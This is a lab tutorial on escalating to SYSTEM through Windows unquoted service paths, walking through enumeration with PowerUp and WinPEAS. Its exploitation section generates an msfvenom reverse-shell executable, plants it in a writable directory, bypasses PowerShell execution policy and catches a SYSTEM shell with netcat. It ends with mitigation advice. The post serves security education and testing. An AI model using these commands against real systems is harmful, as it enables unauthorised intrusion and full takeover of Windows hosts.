Unquoted Path or Unquoted Service path is reported as a critical vulnerability in Windows, such vulnerability allows an attacker to escalate the privilege for NT AUTHORITY/SYSTEM for a low-level privilege user account.
Table of Content
·
Introduction
·
Vulnerability
Insight
·
Prerequisite
·
Lab Setup
·
Abusing Unquoted Service Paths
·
Mitigation
Introduction
Unquoted Service Path
If the path to the service
binary is not enclosed in quotes and contains white spaces, the name of a
loophole for an installed service is Service Unquoted Path. As a result, a
local user will be able to elevate the privilege to administrator privilege
shell by placing an executable in a
higher level directory within the path.
Mitre ID:
T1574.009
Tactics: Privilege
Escalation & Persistence
Platforms:
Windows
Vulnerability Insight
The Windows API must assume
where to find the referenced application if the path contains spaces and is not
enclosed by quotation marks. If, for example, a service uses the unquoted path:
Vulnerable Service: C:\Program
Files\Ignite Data\Vuln Service\file.exe
The system will read this
path in the following sequence from 1 to 4 to trigger malicous.exe through a
writeable directory.
C:\Program.exe
C:\Program Files\Ignite.exe
C:\Program Files\Ignite
Data\Vuln.exe
C:\Program Files\Ignite
Data\Vuln Service\file.exe
Prerequisite
Target Machine: Windows 10
Attacker Machine: Kali Linux
Tools: SubinACL,
PowerUP.ps1,
Winpeas.
Condition:
Compromise the target machine with low privilege access either using Metasploit
or Netcat, etc.
Objective:
Escalate the NT Authority /SYSTEM privileges for a low privileged user by
exploiting unquoted path Vulnerability.
Lab Setup
To set up a vulnerable
environment for Unquoted Path, we need user accounts. Here we have user
“ignite” who is a member of the Administrator group and “Shreya” who is a member
Users group.
net user ignite
net user shreya
Steps to Setup
Vulnerable Environment
Step1: Create a new folder and Sub Folder and named
it “Ignite Data” & “Vuln Service” respectively
mkdir "C:\Program Files\Ignite Data\Vuln Service"
Step2: Create vulnerable
service with name file.exe
sc create "vulns" binpath= "C:\Program
Files\Ignite Data\Vuln Service\file.exe" start= auto
Step3: Grant
writeable for BUILTIN\Users on Ignite Data folder with the help of icacls
icacls "C:\Program Files\Ignite Data" /grant
"BUILTIN\Users":W
*icacls are Microsoft
Windows native command-line programmes that can display and modify permissions on
directories and files.
Step4: To create a vulnerable service we need to
assign some toxic privilege with the help of SubinACL to
change the permission of services.
NOTE:
SubInACL is a little-known command-line tool from
Microsoft, yet it is one of the best tools to work with security permissions in
Windows. This tool is capable of changing the permissions of files, folders,
registry keys, services, printers, cluster shares and various other types of
objects.
In this case, we have granted a user permissions to
suspend (pause/continue), start and stop (restart) a service. The full list of
the available service permissions:
Step5: After Download SubinACL, execute the
following command to assign PTOC Permissions user “ignite”
against “Pentest” service.
subinacl.exe /service vulns /grant=msedgewin10\shreya=PTO
Abusing Unquoted Service Paths
Abusing unquoted service is a technique that exploits
insecure file permission in order to escalated privileges for local users.
Download the PowerUp.ps1 script inside Kali Linux which will return the name
and binary path for services with unquoted paths that also have a space in the
name.
wget https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
Python –m SimpleHTTPServer 80
Get the initial access of the target machine and transfer
the PowerUp.ps1 and execute the Get-UnquotedService command that will use
Get-WmiObject to query all win32_service objects and extract out the binary
pathname for each. Then checks if any binary paths have a space and aren't
quoted.
nc –lvp 1245
powershell
wget http://192.168.1.3/PowerUp.ps1
-o PowerUP.ps1
powershell –ep bypass
Import-Module .\PowerUp.ps1
Get-UnquotedService
As result, we have enumerated the path for file.exe as highlighted in the below image.
From above, we enumerate three subdirectories:
"Program Files," "Ignite Data," and "Vuln
Service," and for each directory, we use icacls to check permissions.
icacls "C:\Program Files"
icacls "C:\Program Files\Ignite Data"
icacls "C:\Program Files\Ignite Data\Vuln
Service"
Here we found BUILTIN\Users owns writable permissions against
“Ignite Data”
Using auto script WinPEASx64 we enumerate the suspicious file
and folder for the unquoted path.
winPEASx64.exe quiet servicesinfo
As result, it shown the same as above.
It’s time to exploit the weak configured services against
unquoted paths in order to privilege for user Shreya. As we know unquoted
folder name is Vuln Service thus we will create a file with the name Vuln.exe
with the help of msfvenom.
msfvenom –p windows/shell_reverse_tcp lhost=192.168.1.3
lport=8888 –f exe > Vuln.exe
python –m SimpleHTTPServer 80
Start a fresh netcat listen in a new terminal and transfer
the Vuln.exe onto the target machine's "Ignite Data" folder. Since Shreya
is a member of BUILTIN/Users has writable permission for “Ignite Data, and
restarting the service will result in a reverse connection.
cd c:\Program Files\Ignite Data
powershell wget http://192.168.1.3/Vuln.exe
-o Vuln.exe
net start vulns
As soon as the service will launch, the attacker will get a
reverse connection in the new netcat session as NT Authority \system
nc –lvp 8888
whoami
Even if the user has the option to restart the system, this
approach will automatically restart the Vuln.exe service, which will offer a
reverse connection.
shutdown /r /t 0
As soon as the service will launch, the attacker will get a reverse
connection in the new netcat session as NT Authority \system
nc –lvp 8888
Mitigation
Vulnerability
Solution: Ensure that any services that contain a space in the path enclose
the path in quotes.
Restrict File and
Directory Permissions: Restrict access by setting directory and file
permissions that are not specific to users or privileged accounts
Execution Prevention: Block execution of code on a system through application control, and/or script blocking.
0 comments:
Post a Comment